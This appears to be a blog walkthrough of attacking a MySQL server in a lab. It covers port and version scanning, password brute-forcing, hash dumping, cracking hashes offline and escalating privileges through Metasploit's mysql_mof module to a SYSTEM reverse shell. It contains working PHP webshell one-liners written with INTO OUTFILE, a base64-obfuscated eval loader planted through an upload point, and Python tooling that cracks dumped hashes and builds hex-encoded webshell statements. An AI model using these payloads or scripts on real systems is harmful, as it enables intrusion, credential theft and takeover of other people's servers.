Information gathering

Port information gathering

Use nmap. MySQL normally listens on port 3306, but a custom port is possible, so scanning the ports and the services behind them with nmap is worthwhile. Adding -sV also grabs the server banner, which already contains the version needed in the next step.
```
nmap -p 3306 172.16.1.100

Starting Nmap 7.60 ( https://nmap.org ) at 2019-03-07 19:03 CST
Nmap scan report for bogon (172.16.1.100)
Host is up (0.00029s latency).

PORT     STATE SERVICE
3306/tcp open  mysql
MAC Address: 1A:5B:1E:39:86:0E (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds
```
Version information gathering

In security work the exact version matters: a minor version difference can be enough for a payload to stop working.
When an obvious injection point exists, the built-in function and system variable return the version (note that @@version is a variable, not a function, so it takes no parentheses):

```sql
select version();
select @@version;
```
Or use sqlmap (add --banner to have it retrieve the version banner as well):

```shell
sqlmap.py -u url --dbms mysql
```
When the phpMyAdmin management page has a weak password such as root/root, log in and open localhost -> Variables -> Server variables and settings, then read the value of the version parameter.
Scan with msf. The prerequisite is that MySQL allows remote connections for the account; to reproduce locally, add this in the database (the IDENTIFIED BY clause inside GRANT works on 5.x but was removed in MySQL 8.0, where the user has to be created first):

```sql
use mysql;
select user,host from user;
GRANT ALL PRIVILEGES ON *.* TO 'root'@'172.16.1.105' IDENTIFIED BY 'root' WITH GRANT OPTION;
```
Then scan with msf's auxiliary/scanner/mysql/mysql_version module. It needs no credentials, because the MySQL server sends its version in the greeting packet before the client authenticates:

```
use auxiliary/scanner/mysql/mysql_version

msf auxiliary(scanner/mysql/mysql_version) > run
[+] 172.16.1.100:3306 - 172.16.1.100:3306 is running MySQL 5.5.53 (protocol 10)
[*] Scanned 1 of 1 hosts (100% complete)
```
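What mysql_version (and nmap -sV) actually read is the Handshake V10 greeting, and what they hit when the remote-connection prerequisite above is not met is a pre-authentication ERR packet. The following decoder is an added example, not code from this page or from Metasploit; the greeting and error packets it parses are constructed inline (the 172.16.1.105 host in the error text is the attacker address used on this page), and grab_greeting is included only for live use.

```python
"""Added example: decode the MySQL Handshake V10 greeting that nmap -sV and the
msf mysql_version module fingerprint. The sample packets below are constructed
for the example, not captured from the 172.16.1.100 host on this page."""
import socket
import struct

CLIENT_SECURE_CONNECTION = 0x00008000   # server sends the second half of the 20-byte salt
CLIENT_PLUGIN_AUTH = 0x00080000         # server names its default auth plugin
ER_HOST_NOT_PRIVILEGED = 1130           # "Host 'x' is not allowed to connect to this MySQL server"


def _packet(body: bytes, seq: int = 0) -> bytes:
    """Wrap a payload in the 4-byte MySQL packet header (3-byte LE length, sequence id)."""
    return len(body).to_bytes(3, "little") + bytes([seq]) + body


def build_greeting(version: str, conn_id: int, salt: bytes,
                   plugin: bytes = b"mysql_native_password") -> bytes:
    """Constructed V10 greeting (what a reachable server sends before any auth)."""
    assert len(salt) == 20, "auth-plugin-data is 20 bytes for native/sha2 plugins"
    caps = 0x0000F7FF | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH
    body = bytes([10]) + version.encode() + b"\x00"          # protocol 10, NUL-terminated version
    body += struct.pack("<I", conn_id)                         # connection id
    body += salt[:8] + b"\x00"                                 # auth-plugin-data part 1 + filler
    body += struct.pack("<H", caps & 0xFFFF)                   # capability flags, lower 16 bits
    body += bytes([0x21])                                      # character set: utf8_general_ci
    body += struct.pack("<H", 0x0002)                          # status: SERVER_STATUS_AUTOCOMMIT
    body += struct.pack("<H", caps >> 16)                      # capability flags, upper 16 bits
    body += bytes([len(salt) + 1])                             # auth-plugin-data length incl. NUL
    body += b"\x00" * 10                                       # reserved
    body += salt[8:] + b"\x00"                                 # auth-plugin-data part 2
    body += plugin + b"\x00"                                   # auth plugin name
    return _packet(body)


def build_error(code: int, message: str) -> bytes:
    """Constructed pre-auth ERR packet (no SQL-state marker: CLIENT_PROTOCOL_41 is not negotiated yet)."""
    return _packet(b"\xff" + struct.pack("<H", code) + message.encode())


def parse_greeting(packet: bytes) -> dict:
    """Return the fields a scanner reports, or the error if the server refuses this client host."""
    length = int.from_bytes(packet[:3], "little")
    body = packet[4:4 + length]
    if body[0] == 0xFF:
        code = struct.unpack_from("<H", body, 1)[0]
        return {"error": code, "message": body[3:].decode("utf-8", "replace"),
                "remote_blocked": code == ER_HOST_NOT_PRIVILEGED}
    end = body.index(b"\x00", 1)
    version = body[1:end].decode()
    pos = end + 1
    conn_id = struct.unpack_from("<I", body, pos)[0]; pos += 4
    salt = body[pos:pos + 8]; pos += 9                      # 8 salt bytes + 1 filler
    cap_lo = struct.unpack_from("<H", body, pos)[0]; pos += 2
    charset = body[pos]; pos += 1
    status = struct.unpack_from("<H", body, pos)[0]; pos += 2
    cap_hi = struct.unpack_from("<H", body, pos)[0]; pos += 2
    caps = cap_lo | (cap_hi << 16)
    auth_len = body[pos]; pos += 1
    pos += 10                                               # reserved
    if caps & CLIENT_SECURE_CONNECTION:
        n = max(13, auth_len - 8)
        salt += body[pos:pos + n].rstrip(b"\x00"); pos += n
    plugin = ""
    if caps & CLIENT_PLUGIN_AUTH:
        plugin = body[pos:body.index(b"\x00", pos)].decode()
    # MariaDB 10.x reports "5.5.5-10.x.y-MariaDB" for compatibility; strip the fake prefix.
    real = version[6:] if version.startswith("5.5.5-") else version
    return {"protocol": body[0], "version": version, "real_version": real,
            "connection_id": conn_id, "salt": salt, "capabilities": caps,
            "charset": charset, "status": status, "auth_plugin": plugin}


def grab_greeting(host: str, port: int = 3306, timeout: float = 3.0) -> dict:
    """Live banner grab: the server speaks first, so no credentials are needed."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        header = s.recv(4)
        want = int.from_bytes(header[:3], "little")
        body = b""
        while len(body) < want:
            chunk = s.recv(want - len(body))
            if not chunk:
                break
            body += chunk
    return parse_greeting(header + body)


if __name__ == "__main__":
    salt = bytes(range(1, 21))
    print(parse_greeting(build_greeting("5.5.53", 42, salt)))
    print(parse_greeting(build_error(ER_HOST_NOT_PRIVILEGED,
          "Host '172.16.1.105' is not allowed to connect to this MySQL server")))
```

The auth_plugin field is worth recording alongside the version: mysql_native_password means any dumped hashes are the SHA1-based scheme, whereas caching_sha2_password (the 8.0 default) is not crackable with the same tables.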
msf information-gathering modules

msf is remarkably thorough here; the MySQL-related modules can be listed with search mysql.
Hash enumeration

```
msf auxiliary(scanner/mysql/mysql_hashdump) > set password root
password => root
msf auxiliary(scanner/mysql/mysql_hashdump) > run
[+] 172.16.1.100:3306 - Saving HashString as Loot: root:*81F5E21E35407D**4A6CD4A731AEBFB6A**09E1B
[+] 172.16.1.100:3306 - Saving HashString as Loot: root:*81F5E21E35407**84A6CD4A731AEBFB6AF**9E1B
[+] 172.16.1.100:3306 - Saving HashString as Loot: root:*81F5E21E35407D***A6CD4A731AEB**6AF209E1B
[+] 172.16.1.100:3306 - Saving HashString as Loot: root:*81F5E21E35407D***A6CD4A731AEBFB6AF209E**
```
Get related information: database version, operating system name, architecture, data directory, database users and password hashes. The data directory gives away the install layout; with phpStudy the web root normally sits beside it, which is the absolute path the INTO OUTFILE step below needs.

```
msf auxiliary(admin/mysql/mysql_enum) > set username root
username => root
msf auxiliary(admin/mysql/mysql_enum) > set password root
password => root
msf auxiliary(admin/mysql/mysql_enum) > run
[*] 172.16.1.100:3306 - Running MySQL Enumerator...
[*] 172.16.1.100:3306 - Enumerating Parameters
[*] 172.16.1.100:3306 - MySQL Version: 5.5.53
[*] 172.16.1.100:3306 - Compiled for the following OS: Win32
[*] 172.16.1.100:3306 - Architecture: AMD64
[*] 172.16.1.100:3306 - Server Hostname: CHINA-20190124 J
[*] 172.16.1.100:3306 - Data Directory: D:\phpstudy\PHPTutorial\MySQL\data\
[*] 172.16.1.100:3306 - Logging of queries and logins: OFF
[*] 172.16.1.100:3306 - Old Password Hashing Algorith
```
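The hashes mysql_hashdump saves as loot are the 4.1+ mysql_native_password scheme (41 characters starting with *), and the "Old Password Hashing Algorithm" line from mysql_enum refers to the pre-4.1 16-character scheme. Both can be checked against a wordlist offline. The script below is an added example, not code from this page or from Metasploit: the hashing routines are the standard MySQL algorithms, the loot lines are constructed (the first is the hash of the password root used throughout this walkthrough, derived here rather than copied from the masked output above; the last reproduces one of the page's masked lines), and the wordlist is illustrative.

```python
"""Added example: turn mysql_hashdump loot into candidate passwords offline.
Both hashing routines are the standard MySQL algorithms; the loot lines are
constructed here (the page masks its real hashes with **)."""
import hashlib

HEX = set("0123456789abcdefABCDEF")


def mysql_native_hash(password: str) -> str:
    """PASSWORD() for mysql_native_password (MySQL 4.1+): '*' + SHA1(SHA1(pw)) in upper hex."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def mysql_old_hash(password: str) -> str:
    """Pre-4.1 OLD_PASSWORD(): the 16-hex-char scheme mysql_enum flags as
    'Old Password Hashing Algorithm'. Only the low 31 bits of each word are kept,
    and they depend only on low bits, so masking to 32 bits per round is safe."""
    nr, add, nr2 = 1345345333, 7, 0x12345671
    for b in password.encode("utf-8"):
        if b in (0x20, 0x09):            # spaces and tabs are skipped by the original
            continue
        nr ^= (((nr & 63) + add) * b) + (nr << 8)
        nr2 += (nr2 << 8) ^ nr
        add += b
        nr &= 0xFFFFFFFF
        nr2 &= 0xFFFFFFFF
    return "%08x%08x" % (nr & 0x7FFFFFFF, nr2 & 0x7FFFFFFF)


def classify(h: str) -> str:
    """native = 4.1+ SHA1 scheme, old = pre-4.1, unknown = masked/truncated or caching_sha2_password ($A$...)."""
    if len(h) == 41 and h[0] == "*" and set(h[1:]) <= HEX:
        return "native"
    if len(h) == 16 and set(h) <= HEX:
        return "old"
    return "unknown"


def parse_loot(lines):
    """Parse 'user:hash' lines as saved by mysql_hashdump; keep unusable ones so they are reported, not lost."""
    creds = []
    for line in lines:
        line = line.strip()
        if ":" not in line:
            continue
        user, h = line.split(":", 1)
        creds.append((user, h, classify(h)))
    return creds


def crack(creds, wordlist):
    """Dictionary attack: hash each word once per scheme and look the loot up in the tables."""
    native = {mysql_native_hash(w): w for w in wordlist}
    old = {mysql_old_hash(w): w for w in wordlist}
    found = {}
    for user, h, kind in creds:
        if kind == "native":
            found[user] = native.get(h.upper())
        elif kind == "old":
            found[user] = old.get(h.lower())
        else:
            found[user] = None
    return found


# Constructed loot: root with the 4.1+ hash of "root", a legacy account with
# OLD_PASSWORD("root"), and a masked line like the ones on this page.
SAMPLE_LOOT = [
    "root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B",
    "legacy:67457e226a1a15bd",
    "masked:*81F5E21E35407D**4A6CD4A731AEBFB6A**09E1B",
]
SAMPLE_WORDLIST = ["123456", "password", "root", "admin", "toor"]

if __name__ == "__main__":
    print(crack(parse_loot(SAMPLE_LOOT), SAMPLE_WORDLIST))
```

Neither scheme is salted, so a table built once from a wordlist serves every dumped account; that is the reason a default like root/root is recovered instantly, and the reason caching_sha2_password hashes (which are salted) need a real cracker instead.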
All of this assumes the database username and password are already known, so it is really post-exploitation.
MySQL password brute-forcing

Use a multithreaded phpMyAdmin brute-force tool, or Burp Suite against the phpMyAdmin login form.

Download: https://portswigger.net/burp/, http://pan.baidu.com/s/1c1LD6co
Brute-force with msf

A dictionary can also be used for scanning:

```
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.157.1-254
set pass_file /tmp/password.txt
set username root
run
```
Brute-force the MySQL password with nmap:

```shell
nmap --script=mysql-brute 172.16.1.100
```
Brute-forcing is honestly of limited use, but it counts as a method. Note that a burst of failed connections from one host trips max_connect_errors and gets that host blocked until the host cache is flushed (see the flush-hosts note further down).
Writing a shell through MySQL

Export a one-line webshell file. Prerequisites: the account has the FILE privilege, the absolute path of the web root is known, and --secure-file-priv permits exporting to that directory. The variable must be empty to allow writing anywhere; NULL disables INTO OUTFILE entirely, and a directory value restricts writes to that directory. INTO OUTFILE also refuses to overwrite an existing file, and the third statement below relies on short_open_tag being enabled in PHP.

```sql
select '<?php @eval($_POST[cmd]);?>' INTO OUTFILE 'D:/work/WWW/shell.php';
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/www/cmd.php';
SELECT '<? system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php';
```
Antivirus bypass: first upload shell.jpg through an upload point. Because the file does not have a .php extension it is not parsed at this stage. Its content is a loader that decodes and evaluates a base64-encoded one-liner:

```php
<?php $a='PD9waHAgQGV2YWwoJF9QT1NUWydhbnRpYW4zNjUnXSk7ZGllKCk7Pz4=';error_reporting(0);@set_time_limit(0);eval("?>".base64_decode($a));?>
```
Then write an include file from the database so that the shell gets parsed (the page's original used unbalanced single quotes around shell.jpg; double quotes inside the SQL string literal avoid the escaping problem):

```sql
select '<?php include "shell.jpg"; ?>' INTO OUTFILE 'D:/work/WWW/shell.php';
```
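Before attempting any of the INTO OUTFILE writes above it pays to check the three preconditions from the server's own answers (SHOW VARIABLES LIKE 'secure_file_priv'; SHOW GRANTS; SELECT @@version_compile_os;) and to emit the payload as a hex literal, which sidesteps the quote escaping that the statements on this page need. The following is an added example, not code from this page or from any tool it mentions; the server variables, grants and paths are constructed to resemble the page's Windows target and a locked-down Linux one, and preflight cannot detect the remaining failure mode, an already existing target file.

```python
"""Added example: pre-checks and statement construction for SELECT ... INTO OUTFILE.
The server state below is constructed; query a real target with
SHOW VARIABLES LIKE 'secure_file_priv'; SHOW GRANTS; SELECT @@version_compile_os;"""
import ntpath
import posixpath


def secure_file_priv_allows(value, target: str, windows: bool) -> bool:
    """secure_file_priv semantics: NULL disables INTO OUTFILE/LOAD_FILE entirely,
    '' allows any path the mysqld OS user can write, a directory restricts writes to it."""
    if value is None or value == "NULL":      # drivers give None, SHOW VARIABLES prints NULL
        return False
    if value == "":
        return True
    p = ntpath if windows else posixpath
    norm = lambda s: p.normcase(p.normpath(s))   # Windows: case-insensitive, '/' -> '\\'
    base = norm(value).rstrip(p.sep) + p.sep
    return norm(target).startswith(base)


def outfile_statement(payload: str, path: str) -> str:
    """Emit the payload as a hex literal so quotes, backslashes and '<?' need no escaping,
    and use forward slashes in the path (backslashes are escape characters in MySQL strings)."""
    hexed = payload.encode("utf-8").hex()
    safe_path = path.replace("\\", "/").replace("'", "''")
    return "SELECT 0x%s INTO OUTFILE '%s';" % (hexed, safe_path)


def preflight(variables: dict, grants: list, target: str) -> list:
    """Return the reasons a write would fail, given SHOW VARIABLES / SHOW GRANTS output."""
    problems = []
    windows = "win" in variables.get("version_compile_os", "").lower()
    if not any("FILE" in g or "ALL PRIVILEGES" in g for g in grants):
        problems.append("account lacks the FILE privilege")
    if not secure_file_priv_allows(variables.get("secure_file_priv"), target, windows):
        problems.append("secure_file_priv forbids writing to %s" % target)
    return problems


# Constructed server states: a 5.5 phpStudy-style Windows box with an empty
# secure_file_priv, and a 5.7 Linux box confined to its default export directory.
SAMPLE_VARS_OPEN = {"version": "5.5.53", "version_compile_os": "Win32", "secure_file_priv": ""}
SAMPLE_VARS_LOCKED = {"version": "5.7.26", "version_compile_os": "Linux",
                      "secure_file_priv": "/var/lib/mysql-files/"}
SAMPLE_GRANTS = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION"]

if __name__ == "__main__":
    print(preflight(SAMPLE_VARS_OPEN, SAMPLE_GRANTS, "D:/work/WWW/shell.php"))
    print(preflight(SAMPLE_VARS_LOCKED, SAMPLE_GRANTS, "/var/www/shell.php"))
    print(outfile_statement("<?php @eval($_POST['c']);?>", "D:/work/WWW/shell.php"))
```

On a server whose secure_file_priv points at a directory, the write succeeds only inside that directory, which is useless for a webshell unless the web server happens to serve it; that is the same restriction that stops the MOF module later on this page.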
Writing a shell with sqlmap

Start an OS shell through sqlmap, then drop the file from inside that shell (the second line is typed at the os-shell prompt; single quotes keep the shell from expanding $_POST):

```shell
sqlmap -u url --os-shell
echo '<?php @eval($_POST["c"]);?>' > /data/www/1.php
```
MySQL privilege escalation

Use the MOF module in msf, exploit/windows/mysql/mysql_mof. It writes an executable and a .mof file into C:\Windows\System32\wbem\mof\ through the database, relying on the WMI service (which runs as SYSTEM) to auto-compile the MOF file; that auto-compile behaviour only exists on Windows XP / Server 2003 era systems, so the target must be that old and the database account must be able to write files.

It did not succeed: clearly blocked by the --secure-file-priv option. Since the target was a physical machine, this was only a quick try; it will be reproduced on a VM later.

```
[*] Started reverse TCP handler on 172.16.1.105:4444
[*] 172.16.1.100:3306 - Attempting to login as 'root:root'
[*] 172.16.1.100:3306 - Uploading to 'C:/windows/system32/mVvkv.exe'
[-] 172.16.1.100:3306 - MySQL Error: RbMysql::OptionPreventsStatement The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
[*] 172.16.1.100:3306 - Uploading to 'C:/windows/system32/wbem/mof/thrBL.mof'
[-] 172.16.1.100:3306 - MySQL Error: RbMysql::OptionPreventsStatement The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
[!] 172.16.1.100:3306 - This exploit may require manual cleanup of 'mVvkv.exe' on the target
[!] 172.16.1.100:3306 - This exploit may require manual cleanup of 'wbem\mof\good\thrBL.mof' on the target
[*] Exploit completed, but no session was created.
```
Prerequisites:

If the database can be managed through a web page (phpMyAdmin), change the account's host to % and flush privileges; msf and other tools can then connect remotely. By default root and similar accounts are not allowed to connect remotely unless the administrator or the database user has set it up.

```sql
use mysql;
update user set host = '%' where user = 'root';
FLUSH PRIVILEGES;
select host, user from user;
```

If connections are instead refused with "Host ... is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts'" (which happens after a brute-force attempt exceeds max_connect_errors), the fix is to clear the host cache with mysqladmin flush-hosts, or FLUSH HOSTS; inside the database. FLUSH PRIVILEGES does not reset that counter.
The privilege-escalation part is left as a to-do; it will be retried once a virtual machine is set up.
Update 3/14: msf's mysql_mof against Windows Server 2003 successfully returned a reverse shell. The session runs as NT AUTHORITY\SYSTEM because the WMI service compiles the MOF file, and the hashdump shows Administrator and Guest with the NT hash of an empty password (31d6cfe0d16ae931b73c59d7e0c089c0).

```
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:c7562a9f398996e704da7a1ff47c554c:::

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>
```
Author:
zhhhy
Permalink:
http://yoursite.com/2019/03/12/myhack-sql/
License:
Copyright (c) 2019 CC-BY-NC-4.0 LICENSE